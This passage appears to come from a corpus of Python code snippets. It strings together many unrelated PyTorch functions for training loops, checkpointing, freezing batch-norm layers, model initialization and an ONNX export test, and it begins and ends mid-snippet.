class method\n epochs_since_improvement = 0\n best_params = None\n self.calculate_validation_loss()\n best_validation_loss = self.validation_average_loss\n\n while epochs_since_improvement < 10:\n self.train_epoch()\n self.calculate_validation_loss()\n if self.validation_average_loss < best_validation_loss:\n epochs_since_improvement = 0\n best_validation_loss = self.validation_average_loss\n best_params = self.network.state_dict()\n else:\n epochs_since_improvement += 1\n LOGGER.info(\"Epochs since improvement in validation_loss: {} \\n\".format(epochs_since_improvement))\n if self.maximum_epochs_allowed is not None and self.epochs_trained >= self.maximum_epochs_allowed:\n break\n LOGGER.info(\"Training complete after {} epochs \\n\".format(self.epochs_trained))\n LOGGER.info(\"Best training loss achieved: {} \\n\".format(self.training_average_loss))\n LOGGER.info(\"Best validation loss achieved: {}\".format(self.validation_average_loss))\n self.learned_params = best_params\n self.network.load_state_dict(best_params)", "def train(self, train_loader):\n\n self.model.train()\n with torch.enable_grad():\n return self._iteration(train_loader)", "def train(self):\n # self.recognizer.train()\n self.detector.train()\n self.shared_conv.train()", "def train(self, mode=True):\n super(TSN, self).train(mode)\n count = 0\n if self._enable_pbn:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.base_model.modules():\n # print('the type train model : {}'.format(type(m)))\n if isinstance(m, torch.nn.BatchNorm2d) or \\\n isinstance(m, linklink.nn.syncbn_layer.SyncBatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n # print('the freeze module: {} of {}th'.format(type(m), count))\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train(self, train_loader):\n pass", "def trainNet():", "def test_no_model_parallel(self):\n for m in ['transformer/generator', 'transformer/ranker']:\n try:\n _ = self._distributed_train_model(model=m, model_parallel=True)\n except RuntimeError:\n pass\n else:\n self.fail('Did not raise RuntimeError')", "def set_train_mode(training, mnet, hnet, hhnet, dis):\n for net in [mnet, hnet, hhnet, dis]:\n if net is not None:\n if training:\n net.train()\n else:\n net.eval()", "def train(self):\n\n # Ensure everything is sent to GPU if being trained on the cloud\n if self.local == False:\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n print(\"\\n \\n EVERYTHING TO CUDA \\n \\n\")\n\n # Load weights if applicable\n if self.load_weights == True:\n start_epoch, loss = self.load_checkpoint(\n self.model, self.optimizer, self.model_name\n )\n start_epoch += 1\n print(\"\\n \\n [WEIGHTS LOADED]\")\n else:\n start_epoch = 0\n\n # Start Training Loop\n for epoch in range(start_epoch, self.epochs + 1):\n\n # TRAIN\n if epoch > 0:\n\n # Set model to training mode\n self.model.train()\n\n # Initialize loss and counter that will allow model weights to be saved and overwritten every 10 minibatches\n train_loss = 0\n counter = 0\n\n # Iterate through train set\n for (\n image1,\n image2,\n annotation1,\n annotation2,\n landmark1,\n landmark2,\n ) in tqdm(self.train_loader, desc=\"Train Epoch \" + str(epoch)):\n\n # image tensors and bounding box and label tensors to device\n image1 = image1.to(self.device)\n image2 = image2.to(self.device)\n\n # Forward pass of model\n x1_hat, x2_hat, z1, z2 = self.model(image1, image2)\n\n # Calculate loss from one pass and append to training loss\n loss = self.loss_fcn(\n image1, image2, x1_hat, x2_hat, z1.detach(), z2.detach()\n )\n train_loss += loss.item()\n\n # Clear optimizer gradient\n self.optimizer.zero_grad()\n\n # Backprop\n loss.backward()\n\n # Take a step with optimizer\n self.optimizer.step()\n\n # Save/overwrite model weights every 10 minibatches\n if counter % 10 == 0:\n self.save_checkpoint(\n self.model,\n self.optimizer,\n self.model_name,\n epoch,\n train_loss,\n )\n\n print(\n f\"====> Epoch: {epoch} Average train loss: {train_loss / len(self.train_loader.dataset):.4f}\\n\"\n )\n\n # Save entire model as .pt after every epoch of training\n if self.local == True:\n torch.save(\n self.model,\n os.path.join(self.save_path, self.model_name + \".pt\"),\n )\n else:\n torch.save(\n self.model, self.model_name + \"_epoch\" + str(epoch) + \".pt\"\n )\n print(\"SAVED MODEL EPOCH \" + str(epoch))\n\n # Evaluate on Validation Set after each epoch\n with torch.no_grad():\n\n # Set model to evaluation mode\n self.model.eval()\n\n # Iterate through validation set\n for image1, image2, annotation1, annotation2 in tqdm(\n self.val_loader, desc=\"Validation Epoch \" + str(epoch)\n ):\n\n # Initialize validation loss\n val_loss = 0\n\n # Send images to device\n image1 = image1.to(self.device)\n image2 = image2.to(self.device)\n\n # Forward pass of model\n x1_hat, x2_hat, z1, z2 = self.model(image1, image2)\n\n # Calculate loss and append to validation loss\n loss = self.loss_fcn(\n image1, image2, x1_hat, x2_hat, z1.detach(), z2.detach()\n )\n val_loss += loss\n\n print(\n f\"====> Epoch: {epoch} Average test loss: {val_loss / len(self.val_loader.dataset):.4f}\\n\"\n )\n\n print(\"[DONE EPOCH{}]\".format(epoch))\n\n print(\"[DONE TRAINING]\")\n\n # Save model after all epochs are finished\n if self.local == True:\n torch.save(\n self.model, os.path.join(self.save_path, self.model_name + \".pt\")\n )\n else:\n torch.save(self.model, self.model_name + \".pt\")", "def train_start(self):\n self.module.img_enc.train()\n self.module.txt_enc.train()", "def train(self, x_data, y_data):\n for model in self.list_of_models:\n model.fit(x_data, y_data)\n self.trained_models.append(model)", "def train(settings=None):\n if not settings:\n settings = Settings()\n train_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.RandomHorizontalFlip(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n validation_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n\n train_dataset = CrowdDatasetWithUnlabeled(settings.train_dataset_path, 'train', transform=train_transform)\n train_dataset_loader = torch.utils.data.DataLoader(train_dataset, batch_size=settings.batch_size, shuffle=True,\n num_workers=settings.number_of_data_loader_workers)\n validation_dataset = CrowdDataset(settings.validation_dataset_path, 'validation', transform=validation_transform)\n validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=settings.batch_size,\n shuffle=False,\n num_workers=settings.number_of_data_loader_workers)\n\n gan = GAN()\n gpu(gan)\n D = gan.D\n G = gan.G\n discriminator_optimizer = Adam(D.parameters())\n generator_optimizer = Adam(G.parameters())\n\n step = 0\n epoch = 0\n\n if settings.load_model_path:\n d_model_state_dict, d_optimizer_state_dict, epoch, step = load_trainer(prefix='discriminator',\n settings=settings)\n D.load_state_dict(d_model_state_dict)\n discriminator_optimizer.load_state_dict(d_optimizer_state_dict)\n discriminator_optimizer.param_groups[0].update({'lr': settings.learning_rate, 'weight_decay': settings.weight_decay})\n if settings.load_model_path:\n g_model_state_dict, g_optimizer_state_dict, _, _ = load_trainer(prefix='generator',\n settings=settings)\n G.load_state_dict(g_model_state_dict)\n generator_optimizer.load_state_dict(g_optimizer_state_dict)\n generator_optimizer.param_groups[0].update({'lr': settings.learning_rate})\n\n running_scalars = defaultdict(float)\n validation_running_scalars = defaultdict(float)\n running_example_count = 0\n datetime_string = datetime.datetime.now().strftime(\"y%Ym%md%dh%Hm%Ms%S\")\n trial_directory = os.path.join(settings.log_directory, settings.trial_name + ' ' + datetime_string)\n os.makedirs(trial_directory, exist_ok=True)\n summary_writer = SummaryWriter(os.path.join(trial_directory, 'train'))\n validation_summary_writer = SummaryWriter(os.path.join(trial_directory, 'validation'))\n print('Starting training...')\n step_time_start = datetime.datetime.now()\n while epoch < settings.number_of_epochs:\n for examples, unlabeled_examples in train_dataset_loader:\n unlabeled_images = unlabeled_examples[0]\n # Real image discriminator processing.\n discriminator_optimizer.zero_grad()\n images, labels, _ = examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n current_batch_size = images.data.shape[0]\n predicted_labels, predicted_counts = D(images)\n real_feature_layer = D.feature_layer\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n loss = count_loss + (density_loss * 10)\n loss.backward()\n running_scalars['Labeled/Loss'] += loss.data[0]\n running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n running_scalars['Labeled/Count ME'] += (predicted_counts - labels.sum(1).sum(1)).mean().data[0]\n # Unlabeled.\n _ = D(gpu(images))\n labeled_feature_layer = D.feature_layer\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n unlabeled_loss = feature_distance_loss(unlabeled_feature_layer, labeled_feature_layer,\n scale=False) * settings.unlabeled_loss_multiplier\n unlabeled_loss.backward()\n # Fake.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n z = torch.from_numpy(MixtureModel([norm(-settings.mean_offset, 1), norm(settings.mean_offset, 1)]).rvs(\n size=[current_batch_size, 100]).astype(np.float32))\n # z = torch.randn(settings.batch_size, noise_size)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples.detach())\n fake_feature_layer = D.feature_layer\n fake_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer,\n order=1).neg() * settings.fake_loss_multiplier\n fake_loss.backward()\n # Feature norm loss.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n feature_norm_loss = (unlabeled_feature_layer.norm(dim=1).mean() - 1).pow(2)\n feature_norm_loss.backward()\n # Gradient penalty.\n if settings.gradient_penalty_on:\n alpha = gpu(Variable(torch.rand(2)))\n alpha = alpha / alpha.sum(0)\n interpolates = (alpha[0] * gpu(Variable(unlabeled_images, requires_grad=True)) +\n alpha[1] * gpu(Variable(fake_examples.detach().data, requires_grad=True)))\n _ = D(interpolates)\n interpolates_predictions = D.feature_layer\n gradients = torch.autograd.grad(outputs=interpolates_predictions, inputs=interpolates,\n grad_outputs=gpu(torch.ones(interpolates_predictions.size())),\n create_graph=True, only_inputs=True)[0]\n gradient_penalty = ((gradients.norm(dim=1) - 1) ** 2).mean() * settings.gradient_penalty_multiplier\n gradient_penalty.backward()\n # Discriminator update.\n discriminator_optimizer.step()\n # Generator.\n if step % 1 == 0:\n generator_optimizer.zero_grad()\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer.detach()\n z = torch.randn(current_batch_size, 100)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples)\n fake_feature_layer = D.feature_layer\n generator_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer)\n generator_loss.backward()\n generator_optimizer.step()\n\n running_example_count += images.size()[0]\n if step % settings.summary_step_period == 0 and step != 0:\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n summary_writer.add_image('Comparison', comparison_image, global_step=step)\n fake_images_image = torchvision.utils.make_grid(fake_examples.data[:9], nrow=3)\n summary_writer.add_image('Fake', fake_images_image, global_step=step)\n print('\\rStep {}, {}...'.format(step, datetime.datetime.now() - step_time_start), end='')\n step_time_start = datetime.datetime.now()\n for name, running_scalar in running_scalars.items():\n mean_scalar = running_scalar / running_example_count\n summary_writer.add_scalar(name, mean_scalar, global_step=step)\n running_scalars[name] = 0\n running_example_count = 0\n for validation_examples in validation_dataset_loader:\n images, labels, _ = validation_examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n predicted_labels, predicted_counts = D(images)\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n count_mae = torch.abs(predicted_counts - labels.sum(1).sum(1)).mean()\n count_me = (predicted_counts - labels.sum(1).sum(1)).mean()\n validation_running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n validation_running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n validation_running_scalars['Test/Count MAE'] += count_mae.data[0]\n validation_running_scalars['Labeled/Count ME'] += count_me.data[0]\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n validation_summary_writer.add_image('Comparison', comparison_image, global_step=step)\n for name, running_scalar in validation_running_scalars.items():\n mean_scalar = running_scalar / len(validation_dataset)\n validation_summary_writer.add_scalar(name, mean_scalar, global_step=step)\n validation_running_scalars[name] = 0\n step += 1\n epoch += 1\n if epoch != 0 and epoch % settings.save_epoch_period == 0:\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n print('Finished Training')\n return trial_directory", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def train():\n pass", "def train(train_dataset: torch.utils.data.Dataset, test_dataset: torch.utils.data.Dataset,\n training_config: dict = train_config, global_config: dict = global_config):\n\n for path in global_config.values():\n create_dirs(path)\n\n # wrap datasets with Dataloader classes\n train_loader = torch.utils.data.DataLoader(train_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n test_loader = torch.utils.data.DataLoader(test_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n\n # model name & paths\n name = \"_\".join([train_config[\"DATE\"], train_config[\"SESSION_NAME\"]])\n modelpath = os.path.join(global_config[\"WEIGHT_DIR\"], name)\n\n # instantiate model\n model = training_config[\"MODEL\"](**training_config[\"MODEL_CONFIG\"])\n\n optimizer = training_config[\"OPTIMIZER\"](model.parameters(),\n **training_config[\"OPTIMIZER_CONFIG\"])\n\n # set up ignite engine\n training_config[\"METRICS\"].update({\"loss\" : Loss(training_config[\"LOSS\"])})\n trainer = create_supervised_trainer(model=model, optimizer=optimizer,\n loss_fn=training_config[\"LOSS\"],\n device=training_config[\"DEVICE\"])\n evaluator = create_supervised_evaluator(model,\n metrics=training_config[\"METRICS\"],\n device=training_config[\"DEVICE\"])\n\n\n # tensorboardX setup\n log_dir = os.path.join(global_config[\"LOG_DIR\"], \"tensorboardx\", name)\n create_dirs(log_dir)\n writer = SummaryWriter(logdir=log_dir)\n\n # log using the logging tool\n logger = log.Log(training_config, run_name=train_config['SESSION_NAME'])\n\n @trainer.on(Events.ITERATION_COMPLETED)\n def log_training(engine):\n iteration = (engine.state.iteration - 1) % len(train_loader) + 1\n writer.add_scalar(\"training/loss\", engine.state.output, engine.state.iteration)\n if iteration % 4 == 0:\n print(\"\\repoch[{}] iteration[{}/{}] loss: {:.2f} \".format(engine.state.epoch,\n iteration, len(train_loader),\n engine.state.output), end=\"\")\n\n # generic evaluation function\n def evaluate(engine, loader):\n evaluator.run(loader)\n metrics = evaluator.state.metrics\n return metrics\n\n # training data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_training_results(engine):\n print(\"\\ntraining results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, train_loader)\n print(metrics)\n for key, value in metrics.items():\n logger.log_metric(key, value)\n writer.add_scalar(\"training/avg_{}\".format(key), value, engine.state.epoch)\n\n # test data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(engine):\n print(\"test results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, test_loader)\n print(metrics)\n for key, value in metrics.items():\n writer.add_scalar(\"validation/avg_{}\".format(key), value, engine.state.epoch)\n\n # model checkpointing\n @trainer.on(Events.EPOCH_COMPLETED)\n def model_checkpoint(engine):\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Checkpoint saved to {}\".format(modelpath + \".pth\"))\n\n # training iteration\n try:\n trainer.run(train_loader, max_epochs=training_config[\"EPOCHS\"])\n except KeyboardInterrupt:\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Model saved to {}\".format(modelpath + \".pth\"))\n raise KeyboardInterrupt\n\n # write weights\n torch.save(model.state_dict(), modelpath + \".pth\")\n\n # write csv log file\n log_content = training_config.copy()\n evaluator.run(test_loader)\n log_content[\"VAL_METRICS\"] = evaluator.state.metrics\n log_path = os.path.join(global_config[\"LOG_DIR\"], training_config[\"LOGFILE\"])\n write_log(log_path, log_content)\n\n logger.end_run()\n \n return evaluator.state.metrics[\"training/avg_loss\"]", "def forward_train(self, *args, **kwargs):\n pass", "def train():\n init_distributed_mode(args)\n save_dir = TRAIN_CFG['save_dir']\n if not os.path.exists(save_dir) and torch.distributed.get_rank() == 0:\n os.mkdir(save_dir)\n kwargs = {}\n # If augmenting data, disable Pytorch's own augmentataion\n # This has to be done manually as augmentation is embedded\n # refer : https://github.com/pytorch/vision/issues/2263\n base_path = DATASET_CFG['base_path']\n train_set = DATASET_CFG['train']\n valid_set = DATASET_CFG['valid']\n dset_mean_std = DATASET_CFG['mean_std']\n if dset_mean_std is not None:\n dataset_mean = [i/255. for i in dset_mean_std[0]]\n dataset_std = [i/255. for i in dset_mean_std[1]]\n else:\n dataset_mean, dataset_std = compute_mean_std(base_path, train_set)\n kwargs['image_mean'] = dataset_mean\n kwargs['image_std'] = dataset_std\n kwargs['min_size'] = DATASET_CFG['min_size']\n kwargs['max_size'] = DATASET_CFG['max_size']\n kwargs['box_detections_per_img'] = 300 # increase max det to max val in our benchmark\n\n # Set benchmark related parameters\n if benchmark == 'ScutHead':\n combined_cfg = {**cfg, **sh_anchors}\n elif benchmark == 'CrowdHuman':\n combined_cfg = {**cfg, **ch_anchors}\n elif benchmark == 'Combined':\n combined_cfg = {**cfg, **combined_anchors}\n else:\n raise ValueError(\"New dataset has to be registered\")\n\n # Create Model\n default_filter = False\n model = customRCNN(cfg=combined_cfg,\n use_deform=NET_CFG['use_deform'],\n ohem=NET_CFG['ohem'],\n context=NET_CFG['context'],\n custom_sampling=NET_CFG['custom_sampling'],\n default_filter=default_filter,\n soft_nms=NET_CFG['soft_nms'],\n upscale_rpn=NET_CFG['upscale_rpn'],\n median_anchors=NET_CFG['median_anchors'],\n **kwargs).cuda() \n model_without_ddp = model\n if args.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu],\n find_unused_parameters=True)\n model_without_ddp = model.module\n\n # Create Optimizer\n params = [p for p in model.parameters() if p.requires_grad]\n optimizer = torch.optim.SGD(params, lr=HYP_CFG['learning_rate'],\n momentum=HYP_CFG['learning_rate'],\n weight_decay=HYP_CFG['weight_decay'])\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=TRAIN_CFG['milestones'],\n gamma=HYP_CFG['gamma'])\n # Restore from checkpoint\n pt_model = TRAIN_CFG['pretrained_model']\n if pt_model:\n model_without_ddp = restore_network(model_without_ddp, pt_model,\n only_backbone=TRAIN_CFG['only_backbone'])\n \n # Create training and vaid dataset\n dataset_param = {'mean': dataset_mean, 'std':dataset_std,\n 'shape':(kwargs['min_size'], kwargs['max_size'])}\n batch_size = HYP_CFG['batch_size']\n train_dataset = HeadDataset(train_set,\n base_path,\n dataset_param,\n train=True)\n val_dataset = HeadDataset(valid_set,\n base_path,\n dataset_param,\n train=False)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_batch_sampler = torch.utils.data.BatchSampler(train_sampler,\n batch_size,\n drop_last=True)\n train_data_loader = torch.utils.data.DataLoader(train_dataset,\n batch_sampler=train_batch_sampler,\n num_workers=args.num_workers,\n collate_fn=collate_fn)\n\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset)\n val_batch_sampler = torch.utils.data.BatchSampler(val_sampler,\n batch_size,\n drop_last=True)\n val_data_loader = torch.utils.data.DataLoader(val_dataset,\n batch_sampler=val_batch_sampler,\n num_workers=args.num_workers,\n collate_fn=collate_fn)\n # Fastforward the LR decayer\n start_epoch = TRAIN_CFG['start_epoch']\n max_epoch = TRAIN_CFG['max_epoch']\n for _ in range(0, -1):\n scheduler.step()\n\n # Start training\n print(\"======= Training for \" + str(max_epoch) + \"===========\")\n for epoch in range(start_epoch, int(max_epoch) + 1):\n if epoch % TRAIN_CFG['eval_every'] == 0:\n print(\"========= Evaluating Model ==========\")\n result_dict = evaluate(model, val_data_loader, benchmark=benchmark)\n if torch.distributed.get_rank() == 0:\n logging.info('Eval score at {0} epoch is {1}'.format(str(epoch),\n result_dict))\n \n train_one_epoch(model, optimizer, train_data_loader,\n device, epoch, print_freq=1000)\n scheduler.step()\n if torch.distributed.get_rank() == 0:\n print(\"Saving model\")\n torch.save(model.state_dict(), osp.join(save_dir,\n TRAIN_CFG['exp_name'] + '_epoch_' + str(epoch) + '.pth'))", "def set_module_trainable(module: nn.Module, mode: bool) -> None:\n for param in module.parameters():\n param.requires_grad = mode", "def forward_train(self, imgs, img_metas, **kwargs):\n pass", "def train(model, criterion, optimizer, scheduler, loaders, callbacks, logdir, num_epochs, verbose):\n \n model = model.cuda()\n for i in range(num_epochs):\n bset_loss = 99999999\n custom_train(model, criterion, optimizer, loaders[\"train\"])\n loss = evaluate(model, loaders[\"valid\"])\n with open(f\"{logdir}/logs.txt\", 'a') as f:\n print(f\"loss:{loss} epoch:{i}\", file=f)\n \n if bset_loss >= loss:\n torch.save(model.state_dict(), f\"{logdir}/checkpoints/best.pth\")\n bset_loss = loss", "def __init__(self, **kwargs):\n\n nn.Module.__init__(self)\n BaseEstimator.__init__(self, **kwargs)", "def train(self):\n raise NotImplementedError", "def setup_ml():\n # load vocabulary\n vocab = open(f\"{VOCABULARY_FILE}\", \"rb\")\n vocab = pickle.load(vocab)\n\n # transformer to preprocess images\n transform_test = transforms.Compose([ \n transforms.Resize(256), \n transforms.RandomCrop(224), \n transforms.RandomHorizontalFlip(), \n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n\n # Initialize the encoder and decoder, and set each to inference mode.\n encoder = EncoderCNN(EMBED_SIZE)\n encoder.eval()\n decoder = DecoderRNN(EMBED_SIZE, HIDDEN_SIZE, VOCAB_SIZE)\n decoder.eval()\n\n # load encoder\n encoder.load_state_dict(\n torch.load(\n os.path.join('./models', ENCODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n\n # load decoder\n decoder.load_state_dict(\n torch.load(\n os.path.join('./models', DECODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n print(\"\\n-- Model components were imported succesfully! -- \\n\")\n return transform_test, encoder, decoder, vocab", "def set_trainable(model, train):\r\n model.trainable = train\r\n for l in model.layers:\r\n l.trainable = train", "def train(self):\n\n if self.Algorithms.startswith(\"TMVA:\"):\n self.trainTMVAMethods()\n elif self.Algorithms.startswith(\"SKL:\"):\n self.trainSKLMethods()\n elif self.Algorithms.startswith(\"TF:\"):\n self.trainTFMethods()\n else:\n print(\"ERROR: Unknown algorithm: {}\".format(self.Algorithms))\n\n return", "def train(self):\n best_loss = math.inf\n for _ in range(self.epoch, self.end_epoch):\n self.summary_writer.add_scalar('epoch', self.epoch, self.total_steps)\n epoch_loss, _ = self.run_epoch(self.dataloader)\n if epoch_loss < best_loss:\n best_loss = epoch_loss\n # save best module as onnx format\n dummy_input = torch.randn((10, 3, self.image_dim, self.image_dim))\n module_path = os.path.join(self.models_dir, 'resnet.onnx')\n self.save_module(\n self.resnet.module, module_path, save_onnx=True, dummy_input=dummy_input)\n self.save_checkpoint('resnet_e{}_state.pth'.format(self.epoch))\n\n # validate step\n val_loss, _ = self.validate()\n\n # update learning rates\n self.lr_scheduler.step(val_loss)\n self.save_learning_rate(self.summary_writer, self.optimizer, self.total_steps)\n self.epoch += 1\n self.test()", "def _train(args): \n\n #device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = 'cpu'\n logger.info(\"Device Type: {}\".format(device))\n\n logger.info(\"Loading SUN360 dataset\")\n transform = transforms.Compose(\n [transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n target_transform = transforms.Compose([transforms.Resize((224,224)),\n transforms.ToTensor()]) \n\n trainset = SUN360Dataset(\"imagedata.json\",transform = transform, target_transform = target_transform)\n train_loader = DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n \"\"\"\n testset = torchvision.datasets.CIFAR10(root=args.data_dir, train=False,\n download=False, transform=transform)\n test_loader = DataLoader(testset, batch_size=args.batch_size,\n shuffle=False, num_workers=args.workers)\n \"\"\" \n\n logger.info(\"Model loaded\")\n model = EfficientNet.from_name('efficientnet-b0',conv_type='Equi')\n\n if torch.cuda.device_count() > 1:\n logger.info(\"Gpu count: {}\".format(torch.cuda.device_count()))\n model = nn.DataParallel(model)\n\n model = model.to(device)\n\n criterion = CELoss().to(device)\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n for epoch in range(0, args.epochs):\n running_loss = 0.0\n for i, data in enumerate(train_loader):\n # get the inputs\n inputs, EM , CM = data\n inputs, EM, CM = inputs.to(device), EM.to(device), CM.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model(inputs)\n EMLoss, CMLoss = map_loss(outputs,EM,CM,criterion)\n loss = EMLoss + CMLoss\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n print('Finished Training')\n return _save_model(model, args.model_dir)", "def test_single_pytorch_module_mapping_to_many_onnx_nodes(self):\n\n AimetLogger.set_level_for_all_areas(logging.DEBUG)\n\n class TwoLayerLstmModel(torch.nn.Module):\n \"\"\"\n Model using torch.nn.LSTM module\n \"\"\"\n def __init__(self):\n super(TwoLayerLstmModel, self).__init__()\n self.lstm = torch.nn.LSTM(input_size=3, hidden_size=5, num_layers=3)\n\n def forward(self, x, hx=None):\n return self.lstm(x, hx)\n\n model_name = 'multilayer_lstm'\n model = TwoLayerLstmModel()\n dummy_input = torch.randn(10, 1, 3)\n\n torch.onnx.export(model, dummy_input, './data/' + model_name + '.onnx')\n onnx_utils.OnnxSaver.set_node_names('./data/' + model_name + '.onnx', model, dummy_input, is_conditional=False,\n module_marker_map={})\n onnx_model = onnx.load('./data/' + model_name + '.onnx')\n\n lstm_nodes = [node for node in onnx_model.graph.node if node.op_type == 'LSTM']\n assert 3 == len(lstm_nodes)\n\n node_to_io_dict, _ = onnx_utils.OnnxSaver.get_onnx_node_to_io_tensor_names_map(onnx_model)\n assert isinstance(node_to_io_dict['lstm#root_node'], list)\n assert 3 == len(node_to_io_dict['lstm#root_node'])", "def train(self):\n\t\traise NotImplementedError", "def initialize_model(model_name, num_classes, feature_extract, verbose=False):\n\n model_ft = None\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n model_ft = models.resnet18(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n model_ft = models.alexnet(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n model_ft = models.vgg11_bn(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n with warnings.catch_warnings(): # temporarily suppress warnings about deprecated functions\n warnings.simplefilter(\"ignore\")\n model_ft = models.squeezenet1_0(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n model_ft = models.densenet121(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=True)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n\n else: # Unreachable\n exit()\n\n # Gather the parameters to be optimized\n params_to_update = list(filter(lambda p: p.requires_grad, model_ft.parameters()))\n\n # Print model info\n if verbose:\n print()\n print(model_ft)\n print()\n print(\"Params to learn:\")\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n print('\\t', name)\n\n return model_ft, params_to_update", "def run(self) -> None:\n self.model = self.trainer.train_model(self.model, self.data)", "def train(self, mode=True):\n super(CRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if self.freeze_bn:\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if self.freeze_bn:\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train(self, mode=True):\n super(RCRNN, self).train(mode)\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n if 